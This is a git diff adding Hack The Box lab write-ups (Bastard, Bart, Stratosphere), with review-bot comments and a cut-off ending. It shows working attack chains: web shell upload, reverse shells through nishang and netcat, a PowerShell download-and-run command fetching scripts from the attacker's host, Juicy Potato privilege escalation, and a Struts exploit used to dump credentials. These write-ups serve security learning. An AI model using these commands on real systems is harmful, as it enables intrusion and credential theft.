+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Bastard]
+ → locate 41564.php
+ /usr/share/exploitdb/exploits/php/webapps/41564.php
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Bastard]
+ → cp /usr/share/exploitdb/exploits/php/webapps/41564.php .
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Bastard]
+ → nano 41564.php
+
+
+
+ #!/usr/bin/php
+ <****?php
+ error_reporting(E_ALL);
+
+ define('QID', 'anything');
+ define('TYPE_PHP', 'application/vnd.php.serialized');
+ define('TYPE_JSON', 'application/json');
+ define('CONTROLLER', 'user');
+ define('ACTION', 'login');
+
+ $myfile = fopen('payload1.txt', 'r');
+ $payload1 = fread($myfile,filesize('payload1.txt'));
+ $url = '10.10.10.9';
+ $endpoint_path = '/rest';
+ $endpoint = 'rest_endpoint'; $file = [
+ 'filename' => 'exp1o1t9r.php',
+ 'data' => $payload1
+ ];
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Bastard]
+ → nano 41564.php
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Bastard]
+ → wget -O payload1.txt https://raw.githubusercontent.com/BlackArch/webshells/master/php/b374k-2.7.php
+ --2020-02-20 19:09:26-- https://raw.githubusercontent.com/BlackArch/webshells/master/php/b374k-2.7.php
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Bastard]
+ → php 41564.php
+ Stored session information in session.json
+ Stored user information in user.json
+ Cache contains 7 entries
+ File written: 10.10.10.9/exp1o1t9r.php
+
+
+Browse to http://10.10.10.9/exp1o1t9r.php logging in with his credentials : b374k and then browse to the reverse shell tab and select php reverse shell clicking Go once your terminal's netcat command is ready
+
+ _Terminal_
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Bastard]
+ → nc -lvnp 9003
+ listening on [any] 9003 ...
+ connect to [10.10.14.11] from (UNKNOWN) [10.10.10.9] 49305
+ b374k shell : connected
+ C:\inetpub\drupal-7.54>whoami
+ nt authority\iusr
+
+ C:\inetpub\drupal-7.54>
+
+
+once we're there, we upload the ms15-051.exe binary through the reverse php shell we just had in order to privesc ,which will send yet another reverse shell but this time as the administrator user :
+
+
+ C:\Windows\system32>whoami
+ whoami
+ nt authority\system
+
+ C:\Windows\system32>type C:\Users\Administrator\Desktop\root.txt.txt
+ type C:\Users\Administrator\Desktop\root.txt.txt
+ 4bXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it ! we got the root flag :)
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
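Review bot: the edited 41564.php excerpt runs two statements on one line, `$endpoint = 'rest_endpoint'; $file = [`, which looks like a newline lost while editing and obscures which variable was actually corrected; the prose says the URL had to be changed to `/rest`, and the excerpt shows that change on `$endpoint_path` while `$endpoint` keeps `rest_endpoint`, so split the line and say explicitly that only `$endpoint_path` was edited. The privilege-escalation step is undocumented: the text says the ms15-051.exe binary is uploaded through the web shell and "sends yet another reverse shell", but no command, listener or output other than the final `whoami` is shown, so a reader cannot tell what was run. Also `<****?php` should be `<?php`, the AM/PM markers in the systeminfo output are mangled as `��` (Greek locale, encoding lost on paste), and the screenshots referenced by "we examine it", "correct this url" and the Conclusion's progress graph are missing from the hunk, leaving only blank lines.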
diff --git a/Medium/20.md b/Medium/20.md
new file mode 100644
index 0000000..d91c407
--- /dev/null
+++ b/Medium/20.md
@@ -0,0 +1,350 @@
+# Bart Writeup
+
+
+
+## Introduction :
+
+Bart is a Medium windows box released back in Febuary 2018.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.3/23 ] [/etc/init.d]
+ → nmap 10.10.10.81 -F
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-14 23:06 GMT
+ Nmap scan report for 10.10.10.81
+ Host is up (0.20s latency).
+ Not shown: 99 filtered ports
+ PORT STATE SERVICE
+ 80/tcp open http
+
+ Nmap done: 1 IP address (1 host up) scanned in 15.46 seconds
+
+ λ nihilist [ 10.10.14.3/23 ] [/etc/init.d]
+ → nmap -sCV -p80 10.10.10.81
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-14 23:09 GMT
+ Nmap scan report for 10.10.10.81
+ Host is up (0.100s latency).
+
+ PORT STATE SERVICE VERSION
+ 80/tcp open http Microsoft IIS httpd 10.0
+ | http-methods:
+ |_ Potentially risky methods: TRACE
+ |_http-server-header: Microsoft-IIS/10.0
+ |_http-title: Did not follow redirect to http://forum.bart.htb/
+ Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 10.49 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 80 running http with a domain name entry forum.bart.htb so let's add it to our /etc/hosts file:
+
+
+ λ root [ 10.10.14.3/23 ] [~]
+ → echo '10.10.10.81 forum.bart.htb bart.htb' >> /etc/hosts
+
+
+` 
+
+And we have access to the webpage ! now let's investigate it a bit further:
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~]
+ → curl -sk http://forum.bart.htb | grep wordpress
+ <****a href="http://wordpress.org/">Proudly powered by WordPress <****/a>
+
+Looks like we have a wordpress website to work with, so my initial reflex was to use dirsearch or gobuster to find it's directories although it seems like we can't use neither of the two on forum.bart.htb nor on bart.htb so by interecepting the request in burpsuite we and from the repeater tab, by rendering the page, it seems to return a 200 status code on non-existant directories so we use the appropriate gobuster command :
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Bart]
+ → gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u bart.htb -s "204,301,302,307,401,403" -t 50
+ ===============================================================
+ Gobuster v3.0.1
+ by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
+ ===============================================================
+ [+] Url: http://bart.htb
+ [+] Threads: 50
+ [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
+ [+] Status codes: 204,301,302,307,401,403
+ [+] User Agent: gobuster/3.0.1
+ [+] Timeout: 10s
+ ===============================================================
+ 2020/03/15 14:09:26 Starting gobuster
+ ===============================================================
+ /forum (Status: 301)
+ /monitor (Status: 301)
+ /Forum (Status: 301)
+ /Monitor (Status: 301)
+
+
+It was painfully slow, but gobuster found some interesting results, in particular the /monitor one which is a PHP Server Monitor v3.2.1 login page:
+
+
+
+Next up we navigate to the Forgot Password tab and enter a random username, to get the following error message :
+
+
+
+Now earlier on we found a username "harvey" so let's try it :
+
+
+
+And seems like this username exists! And trying his last name "potter" as the password gives us access to the monitor.bart.htb page so we edit our /etc/hosts file once again:
+
+
+ 10.10.10.81 forum.bart.htb bart.htb monitor.bart.htb
+
+
+` 
+
+Next up we navigate over to Status > Internal Chat and we see yet another hostname to add to our /etc/hosts file :
+
+
+
+
+ 10.10.10.81 forum.bart.htb bart.htb monitor.bart.htb internal-01.bart.htb
+
+
+Navigating over to internal-01.bart.htb we find the following login page:
+
+
+
+Login page onto which the credentials **harry:potter** don't work so let's go and find the [github page](https://github.com/magkopian/php-ajax-simple-chat) for this simple chat and looking at it we should have access to a register.php page so let's check it out using burpsuite:
+
+
+
+Sending it over to the repeater (CTRL+R) and then going to the repeater (CTRL+SHIFT+R) we are able to craft the following request:
+
+
+
+And looking at the response, we seem to get a 302 status code, which seems like we succeeded in registering our account, so let's go ahead and login using the credential we sent nihilist:prometheus.
+
+
+
+And we're in ! Now looking at the page sourcecode, we are hinted towards the log and log_chat php files:
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~]
+ → curl -sk http://internal-01.bart.htb/log/log.php\?filename\=log.txt\&username;\=harvey
+
+ λ nihilist [ 10.10.14.10/23 ] [~]
+ → curl -sk http://internal-01.bart.htb/log/log.php\?filename\=log.txt
+ <****br /> <****b>Notice <****/b>: Undefined index: username in <****b>C:\inetpub\wwwroot\internal-01\log\log.php <****/b> on line <****b>20 <****/b> <****br />
+ 0%
+ λ nihilist [ 10.10.14.10/23 ] [~]
+ → curl -sk http://internal-01.bart.htb/log/log.php <****br /> <****b>Notice <****/b>: Undefined index: filename in <****b>C:\inetpub\wwwroot\internal-01\log\log.php <****/b> on line <****b>19 <****/b> <****br /> <****br /> <****b>Notice <****/b>: Undefined index: username in <****b>C:\inetpub\wwwroot\internal-01\log\log.php <****/b> on line <****b>20 <****/b> <****br />
+ 0%
+
+Something's sketchy with this log.php file, it looks like it logs the username, and the user agent of the incoming request. So let's craft a request using burpsuite by changing the User-Agent to try and get remote code execution:
+
+
+
+Now that we added the cmd parameter, let's actually use it to get remote code execution: by changing the filename=log.txt parameter to filename=log.php and by adding our cmd=id :
+
+
+
+And we have code execution ! so now let's try to get a reverse shell using nishang's Invoke-PowerShellTcp.ps1
+
+_Terminal 1:_
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Bart]
+ → locate Invoke-PowerShellTcp.ps1
+ /home/nihilist/_HTB/Bastard/Invoke-PowerShellTcp.ps1
+ /usr/share/nishang/Shells/Invoke-PowerShellTcp.ps1
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Bart]
+ → echo 'Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.10 -Port 9001' >> Invoke-PowerShellTcp.ps1
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Bart]
+ → mv Invoke-PowerShellTcp.ps1 nihilist.ps1
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Bart]
+ → python -m SimpleHTTPServer 8081
+ Serving HTTP on 0.0.0.0 port 8081 ...
+
+
+` _Terminal 2:_
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Bart]
+ → nc -lvnp 9001
+ Ncat: Version 7.80 ( https://nmap.org/ncat )
+ Ncat: Listening on :::9001
+ Ncat: Listening on 0.0.0.0:9001
+
+
+
+` 
+
+Now that we have changed our cmd parameter we URL encode it (CTRL+U) and then hit send to get a reverse shell :
+
+
+
+And we have a reverse shell on the box !
+
+## **Part 3 : Getting Root Access**
+
+Now to privesc on this box we'll first check the privileges that are enabled for our user:
+
+
+ PS C:\inetpub\wwwroot\internal-01\simple_chat\includes> whoami /priv
+
+ PRIVILEGES INFORMATION
+ ----------------------
+
+ Privilege Name Description State
+ ======================= ========================================= =======
+ SeChangeNotifyPrivilege Bypass traverse checking Enabled
+ SeImpersonatePrivilege Impersonate a client after authentication Enabled
+ SeCreateGlobalPrivilege Create global objects Enabled
+
+
+
+SetImpersonatePrivilege is enabled so we should be able to get to the SYSTEM privileges using Juicy Potato. Users running the SQL server or IIS usually have these privileges by default. it is designed to allow a service to impersonate other users on the system. Which is why Juicy Potato is of relevance here, because it exploits the way MS handles tokens in order to privesc to SYSTEM. So first let's download the executable locally and then upload it :
+
+_Terminal 1:_
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Bart]
+ → wget https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe
+ --2020-03-15 16:23:24-- https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe
+ Resolving github.com (github.com)... 140.82.118.4
+ Connecting to github.com (github.com)|140.82.118.4|:443... connected.
+ HTTP request sent, awaiting response... 302 Found
+ Location: https://github-production-release-asset-2e65be.s3.amazonaws.com/142582717/538c8db8-9c94-11e8-84e5-46a5d9473358?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential;=AKIAIWNJYAX4CSVEH53A%2F20200315%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date;=20200315T162338Z&X-Amz-Expires;=300&X-Amz-Signature;=ce85a8ad77f1a0147ad0815a54d198c71539339d9a10362e0f008ab3a0ce11c9&X-Amz-SignedHeaders;=host&actor;_id=0&response-content-disposition;=attachment%3B%20filename%3DJuicyPotato.exe&response-content-type;=application%2Foctet-stream [following]
+ --2020-03-15 16:23:30-- https://github-production-release-asset-2e65be.s3.amazonaws.com/142582717/538c8db8-9c94-11e8-84e5-46a5d9473358?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential;=AKIAIWNJYAX4CSVEH53A%2F20200315%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date;=20200315T162338Z&X-Amz-Expires;=300&X-Amz-Signature;=ce85a8ad77f1a0147ad0815a54d198c71539339d9a10362e0f008ab3a0ce11c9&X-Amz-SignedHeaders;=host&actor;_id=0&response-content-disposition;=attachment%3B%20filename%3DJuicyPotato.exe&response-content-type;=application%2Foctet-stream
+ Resolving github-production-release-asset-2e65be.s3.amazonaws.com (github-production-release-asset-2e65be.s3.amazonaws.com)... 52.216.228.40
+ Connecting to github-production-release-asset-2e65be.s3.amazonaws.com (github-production-release-asset-2e65be.s3.amazonaws.com)|52.216.228.40|:443... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 347648 (340K) [application/octet-stream]
+ Saving to: ‘JuicyPotato.exe’
+
+ JuicyPotato.exe 100%[=========>] 339.50K 721KB/s in 0.5s
+
+ 2020-03-15 16:23:31 (721 KB/s) - ‘JuicyPotato.exe’ saved [347648/347648]
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Bart]
+ → python -m SimpleHTTPServer 8081
+ Serving HTTP on 0.0.0.0 port 8081 ...
+
+
+` _Terminal 2:_
+
+
+ PS C:\inetpub\wwwroot\internal-01\simple_chat\includes> cd C:\Users\Public\Downloads
+ PS C:\Users\Public\Downloads> iex(new-object net.webclient).downloadfile('http://10.10.14.10:8081/JuicyPotato.exe','C:\Users\Public\Downloads\jp.exe')
+ PS C:\Users\Public\Downloads> Invoke-PowerShellTcp : Cannot bind argument to parameter 'Command' because it
+ is null.
+ At line:126 char:2
+ + }Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.10 -Port 9001
+ + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ + CategoryInfo : NotSpecified: (:) [Write-Error], WriteErrorExcep
+ tion
+ + FullyQualifiedErrorId : Microsoft.PowerShell.Commands.WriteErrorExceptio
+ n,Invoke-PowerShellTcp
+
+
+ PS C:\Users\Public\Downloads> ls
+
+
+ Directory: C:\Users\Public\Downloads
+
+
+ Mode LastWriteTime Length Name
+ ---- ------------- ------ ----
+ -a---- 15/03/2020 16:29 347648 jp.exe
+
+
+Once downloaded, we execute it :
+
+
+ PS C:\Users\Public\Downloads> ./jp.exe
+ JuicyPotato v0.1
+
+ Mandatory args:
+ -t createprocess call: <****t> CreateProcessWithTokenW, <****u> CreateProcessAsUser, <*> try both
+ -p <****program>: program to launch
+ -l <****port>: COM server listen port
+
+
+ Optional args:
+ -m <****ip>: COM server listen address (default 127.0.0.1)
+ -a <****argument>: command line argument to pass to program (default NULL)
+ -k <****ip>: RPC server ip address (default 127.0.0.1)
+ -n <****port>: RPC server listen port (default 135)
+ -c <{clsid}>: CLSID (default BITS:{4991d34b-80a1-4291-83b6-3328366b9097})
+ -z only test CLSID and print token's user
+
+
+Here we will need -t , -p and -l , so locally we'll copy yet another reverse shell from nishang, and add the correct line at the end of it :
+
+_Terminal 1:_
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Bart]
+ → locate Invoke-PowerShellTcp.ps1
+ /home/nihilist/_HTB/Bastard/Invoke-PowerShellTcp.ps1
+ /usr/share/nishang/Shells/Invoke-PowerShellTcp.ps1
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Bart]
+ → cp /usr/share/nishang/Shells/Invoke-PowerShellTcp.ps1 .
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Bart]
+ → mv Invoke-PowerShellTcp.ps1 ech1.ps1
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Bart]
+ → echo 'Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.10 -Port 9002' >> ech1.ps1
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Bart]
+ → nano shell.bat
+
+
+Next up we create the shell.bat file that will download and execute our ech1.ps1 reverse shell :
+
+
+ powershell -c iex(new-object net.webclient).downloadstring('http://10.10.14.10:8081/ech1.ps1')
+
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Bart]
+ → python -m SimpleHTTPServer 8081
+ Serving HTTP on 0.0.0.0 port 8081 ...
+
+
+` _Terminal 3:_
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Bart]
+ → nc -lvnp 9002
+
+
+Now we download and execute our shell.bat file that will download and execute our ech1.ps1 reverse shell so that we can grab the incoming reverse shell on our port 9002:
+
+_Terminal 2:_
+
+
+ iex(new-object net.webclient).downloadfile('http://10.10.14.10:8081/shell.bat','C:\Users\Public\Downloads\shell.bat')
+
+
+` 
+
+And it worked ! However the shell closes on us after a bit so we'll use our jp.exe in conjunction with a Windows 10 Pro CLSID available on Juicy Potato's github repository to finally get the reverse shell with SYSTEM privileges:
+
+
+
+And that's it ! we have been able to print out the user and root flags !
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
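Review bot: the credentials are inconsistent within the hunk: Part 2 first establishes the username `harvey` with password `potter` for the /monitor login, then says "the credentials harry:potter don't work" on internal-01, so one of the two names is a typo. In Part 3 the prose writes `SetImpersonatePrivilege` where the `whoami /priv` output directly above reads `SeImpersonatePrivilege`. The `Invoke-PowerShellTcp : Cannot bind argument to parameter 'Command' because it is null` error printed after the `iex(new-object net.webclient).downloadfile(...)` line is explained by the visible command: `downloadfile` returns nothing, so the outer `iex` is handed `$null`; the download itself succeeded, as the following `ls` shows, and one sentence saying the error is harmless would save readers a detour. The trace line `+ }Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.10 -Port 9001` also shows that the `echo >>` appended the call onto the script's closing brace, which is worth a remark since it is how the error trace ends up pointing at line 126. Formatting: the seven lines consisting only of a backtick are leftovers of image markup whose `![]()` was dropped, the sentence "so by interecepting the request in burpsuite we and from the repeater tab, by rendering the page" is garbled, and "Sending it over to the repeater (CTRL+R) and then going to the repeater (CTRL+SHIFT+R)" should distinguish sending to Repeater from switching to the Repeater tab.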
diff --git a/Medium/21.md b/Medium/21.md
new file mode 100644
index 0000000..f40e9ef
--- /dev/null
+++ b/Medium/21.md
@@ -0,0 +1,362 @@
+# Stratosphere Writeup
+
+
+
+## Introduction :
+
+Stratosphere is a Medium Linux box released back in March 2018.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~]
+ → nmap -sCV -p 22,80,8080 10.10.10.64
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-15 22:52 GMT
+ Nmap scan report for 10.10.10.64
+ Host is up (0.091s latency).
+
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u2 (protocol 2.0)
+ | ssh-hostkey:
+ | 2048 5b:16:37:d4:3c:18:04:15:c4:02:01:0d:db:07:ac:2d (RSA)
+ | 256 e3:77:7b:2c:23:b0:8d:df:38:35:6c:40:ab:f6:81:50 (ECDSA)
+ |_ 256 d7:6b:66:9c:19:fc:aa:66:6c:18:7a:cc:b5:87:0e:40 (ED25519)
+ 80/tcp open http
+ | fingerprint-strings:
+ | FourOhFourRequest:
+ | HTTP/1.1 404
+ | Content-Type: text/html;charset=utf-8
+ | Content-Language: en
+ | Content-Length: 1114
+ | Date: Sun, 15 Mar 2020 22:53:54 GMT
+ | Connection: close
+ | GetRequest:
+ | HTTP/1.1 200
+ | Accept-Ranges: bytes
+ | ETag: W/"1708-1519762495000"
+ | Last-Modified: Tue, 27 Feb 2018 20:14:55 GMT
+ | Content-Type: text/html
+ | Content-Length: 1708
+ | Date: Sun, 15 Mar 2020 22:53:54 GMT
+ | Connection: close
+ | HTTPOptions:
+ | HTTP/1.1 200
+ | Allow: GET, HEAD, POST, PUT, DELETE, OPTIONS
+ | Content-Length: 0
+ | Date: Sun, 15 Mar 2020 22:53:54 GMT
+ | Connection: close
+ | RTSPRequest, X11Probe:
+ | HTTP/1.1 400
+ | Date: Sun, 15 Mar 2020 22:53:54 GMT
+ |_ Connection: close
+ | http-methods:
+ |_ Potentially risky methods: PUT DELETE
+ |_http-title: Stratosphere
+ 8080/tcp open http-proxy
+ | fingerprint-strings:
+ | FourOhFourRequest:
+ | HTTP/1.1 404
+ | Content-Type: text/html;charset=utf-8
+ | Content-Language: en
+ | Content-Length: 1114
+ | Date: Sun, 15 Mar 2020 22:53:54 GMT
+ | Connection: close
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 22.10 seconds
+
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 80 and 8080 running http so let's dirsearch both of them :
+
+
+
+Suprisingly both the dirsearch scans found the exact same directories :
+
+
+ _|. _ _ _ _ _ _|_ v0.3.9
+ (_||| _) (/_(_|| (_| )
+
+ Extensions: txt, html, php, xml | HTTP method: get | Threads: 50 | Wordlist size: 220521
+
+ Error Log: /home/nihilist/Desktop/Tools/dirsearch/logs/errors-20-03-15_22-57-35.log
+
+ Target: http://10.10.10.64/
+
+ [22:57:35] Starting:
+ [22:57:36] 200 - 2KB - /
+ [22:57:58] 302 - 0B - /manager -> /manager/
+ [22:58:31] 302 - 0B - /Monitoring -> /Monitoring/
+ [22:59:07] 400 - 0B - /http%3A%2F%2Fwww
+ [23:00:58] 400 - 0B - /http%3A%2F%2Fyoutube
+ [23:01:46] 400 - 0B - /http%3A%2F%2Fblogs
+ [23:01:52] 400 - 0B - /http%3A%2F%2Fblog
+ [23:02:30] 400 - 0B - /%2A%2Ahttp%3A%2F%2Fwww
+
+
+So we investigate /manager:
+
+
+
+Which is a login form, so we move over to /Monitoring
+
+
+
+Here we see that we are redirected to the following link : **http://10.10.10.64:8080/Monitoring/example/Welcome.action** and that we can either sign on or register, however trying to register we see that we get an error:
+
+
+
+With the following URL :
+
+
+ http://10.10.10.64/Monitoring/example/Register.action;jsessionid=AFF9FBE2C10195E4BD717ABD893099E2
+
+
+Moving over to the Sign On page we try to login with a random username and password, and we get the following request:
+
+
+
+we'll leave that aside for now, and head back to the Monitoring homepage, we see that the extension .action is used instead of .do for apache struts actions. Struts is a model-view-controller framework for creating java web applications. Struts has suffered from a couple of vulnerabilities using the technique of object-graph navigation language (OGNL) injection. OGNL is an expression language that allows the setting of an object properties and execution of various methods of Java classes, which can be maliciously used to perform RCE attacks against Apache servers. Most notably [cve2017-5638](https://www.exploit-db/exploits/41570), to which we have a few exploits we can use:
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~]
+ → cd /usr/share/exploitdb
+
+ λ nihilist [ 10.10.14.10/23 ] [/usr/share/exploitdb]
+ → grep -Ri 2017-5638
+ exploits/linux/webapps/41570.py: print('[*] CVE: 2017-5638 - Apache Struts2 S2-045')
+ exploits/multiple/remote/41614.rb: ['CVE', '2017-5638'],
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Stratosphere]
+ → cp /usr/share/exploitdb/exploits/linux/webapps/41570.py .
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Stratosphere]
+ → nano 41570.py
+
+
+In it we can see that it is trying to abuse the Content-Type header by setting it to **%{(#_='multipart/form-data').(payload)** :
+
+
+
+we can even check if it is vulnerable to this particular CVE by using nmap's --script flag:
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~]
+ → nmap -p8080 --script http-vuln-cve2017-5638 --script-args path=/Monitoring/ 10.10.10.64
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-16 08:44 GMT
+ Nmap scan report for 10.10.10.64
+ Host is up (0.094s latency).
+
+ PORT STATE SERVICE
+ 8080/tcp open http-proxy
+ | http-vuln-cve2017-5638:
+ | VULNERABLE:
+ | Apache Struts Remote Code Execution Vulnerability
+ | State: VULNERABLE
+ | IDs: CVE:CVE-2017-5638
+ | Apache Struts 2.3.5 - Struts 2.3.31 and Apache Struts 2.5 - Struts 2.5.10 are vulnerable to a Remote Code Execution
+ | vulnerability via the Content-Type header.
+ |
+ | Disclosure date: 2017-03-07
+ | References:
+ | https://cwiki.apache.org/confluence/display/WW/S2-045
+ | http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html
+ |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638
+
+
+And it looks like it is vulnerable, so let's test it out but be careful that the final / of the URL is important otherwise you won't get any results:
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Stratosphere]
+ → python 41570.py http://10.10.10.64:8080/Monitoring id
+ [*] CVE: 2017-5638 - Apache Struts2 S2-045
+ [*] cmd: id
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Stratosphere]
+ → python 41570.py http://10.10.10.64:8080/Monitoring/ id
+ [*] CVE: 2017-5638 - Apache Struts2 S2-045
+ [*] cmd: id
+
+ uid=115(tomcat8) gid=119(tomcat8) groups=119(tomcat8)
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Stratosphere]
+ → python 41570.py http://10.10.10.64:8080/Monitoring/ "cat /home/richard/user.txt"
+ [*] CVE: 2017-5638 - Apache Struts2 S2-045
+ [*] cmd: cat /home/richard/user.txt
+
+ cat: /home/richard/user.txt: Permission denied
+
+
+
+And we get RCE as tomcat8 ! However trying to print the user richard flag we see that we need to privesc so you could try to get a reverse shell but it may be tedious since we'll find out later on that the box has iptables configured. So first we print out the db_connect file contents to see if we can grab credentials:
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Stratosphere]
+ → python 41570.py http://10.10.10.64:8080/Monitoring/ "ls"
+ [*] CVE: 2017-5638 - Apache Struts2 S2-045
+ [*] cmd: ls
+
+ conf
+ db_connect
+ lib
+ logs
+ policy
+ webapps
+ work
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Stratosphere]
+ → python 41570.py http://10.10.10.64:8080/Monitoring/ "cat db_connect"
+ [*] CVE: 2017-5638 - Apache Struts2 S2-045
+ [*] cmd: cat db_connect
+
+ [ssn]
+ user=ssn_admin
+ pass=AWs64@on*&
+
+ [users]
+ user=admin
+ pass=admin
+
+
+
+You may be tempted to use the ssn_admin:AWs64@on*& creds but as a matter of fact we'll use the default credentials admin:admin to log into mysql and print out other credentials:
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Stratosphere]
+ → python 41570.py http://10.10.10.64:8080/Monitoring/ **"** mysql -u admin **-p admin** -e "use users;select * from accounts"**"**
+
+
+This above is incorrect since we have to use a pair of singlequotes and doublequotes instead of 2 pairs of doublequotes, moreso the -p admin syntax is incorrect because you need to spell it this way (-padmin) so now we correct our command :
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Stratosphere]
+ → python 41570.py http://10.10.10.64:8080/Monitoring/ **'** mysql -u admin **-padmin** -e "use users;select * from accounts"**'**
+ [*] CVE: 2017-5638 - Apache Struts2 S2-045
+ [*] cmd: mysql -u admin -padmin -e "use users;select * from accounts"
+
+ fullName password username
+ Richard F. Smith 9tc*rhKuG5TyXvUJOrE^5CK7k richard
+
+
+And we have credentials ! richard:9tc*rhKuG5TyXvUJOrE^5CK7k so we log into the machine via ssh:
+
+
+ λ nihilist [ 10.10.14.10/23 ] [~/_HTB/Stratosphere]
+ → ssh richard@10.10.10.64
+ The authenticity of host '10.10.10.64 (10.10.10.64)' can't be established.
+ ECDSA key fingerprint is SHA256:tQZo8j1TeVASPxWyDgqJf8PaDZJV/+LeeBZnjueAW/E.
+ Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
+ Warning: Permanently added '10.10.10.64' (ECDSA) to the list of known hosts.
+ richard@10.10.10.64's password:
+ Linux stratosphere 4.9.0-6-amd64 #1 SMP Debian 4.9.82-1+deb9u2 (2018-02-21) x86_64
+
+ The programs included with the Debian GNU/Linux system are free software;
+ the exact distribution terms for each program are described in the
+ individual files in /usr/share/doc/*/copyright.
+
+ Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
+ permitted by applicable law.
+ Last login: Tue Feb 27 16:26:33 2018 from 10.10.14.2
+ richard@stratosphere:~$ cat user.txt
+ e6XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it ! We have been able to print out the user flag.
+
+## **Part 3 : Getting Root Access**
+
+Now our first reflex to enumerate a box is by typing sudo -l to see if we can execute anything with root privileges as the current user:
+
+
+ richard@stratosphere:~$ sudo -l
+ Matching Defaults entries for richard on stratosphere:
+ env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
+
+ User richard may run the following commands on stratosphere:
+ (ALL) NOPASSWD: /usr/bin/python* /home/richard/test.py
+
+
+
+ richard@stratosphere:~$ cat /home/richard/test.py
+ #!/usr/bin/python3
+ import hashlib
+
+
+ def question():
+ q1 = input("Solve: 5af003e100c80923ec04d65933d382cb\n")
+ md5 = hashlib.md5()
+ md5.update(q1.encode())
+ if not md5.hexdigest() == "5af003e100c80923ec04d65933d382cb":
+ print("Sorry, that's not right")
+ return
+ print("You got it!")
+ q2 = input("Now what's this one? d24f6fb449855ff42344feff18ee2819033529ff\n")
+ sha1 = hashlib.sha1()
+ sha1.update(q2.encode())
+ if not sha1.hexdigest() == 'd24f6fb449855ff42344feff18ee2819033529ff':
+ print("Nope, that one didn't work...")
+ return
+ print("WOW, you're really good at this!")
